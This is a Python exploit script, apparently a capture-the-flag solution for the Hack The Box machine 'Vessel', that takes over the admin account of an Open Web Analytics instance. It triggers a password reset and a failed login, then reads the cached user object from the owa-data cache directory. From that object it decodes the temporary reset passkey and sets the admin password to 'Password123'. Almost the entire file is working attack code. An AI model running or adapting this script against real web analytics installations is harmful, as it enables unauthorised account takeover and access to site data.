32 lines
1.5 KiB
Python
32 lines
1.5 KiB
Python
import requests, base64
|
|
|
|
proxy = {'http':'http://127.0.0.1:8080'}
|
|
|
|
if __name__ == '__main__':
|
|
print("requesting admin reset")
|
|
s = requests.session()
|
|
data = {
|
|
'owa_email_address':'admin@vessel.htb',
|
|
'owa_action':'base.passwordResetRequest',
|
|
'owa_submit':'Request New Password'
|
|
}
|
|
s.post("http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm", data=data, proxies=proxy)
|
|
print("false login on admin")
|
|
data = 'owa_user_id=admin&owa_password=password&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&owa_action=base.login&owa_submit_btn=Login'
|
|
s.post('http://openwebanalytics.vessel.htb/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&', data=data, proxies=proxy)
|
|
|
|
r = s.get('http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php')
|
|
b = base64.b64decode(r.text[9:-6])
|
|
temp_pass = b.decode().split("temp_passkey")[1][57:89]
|
|
print(temp_pass)
|
|
data = f'owa_password=Password123&owa_password2=Password123&owa_k={temp_pass}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password'
|
|
h = {
|
|
'Referer': 'http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword',
|
|
'Origin': 'http://openwebanalytics.vessel.htb',
|
|
'Content-Type': 'application/x-www-form-urlencoded'
|
|
}
|
|
|
|
|
|
r = s.post('http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword', headers=h, data=data, proxies=proxy)
|
|
print("Password changed to 'Password123")
|
|
pass |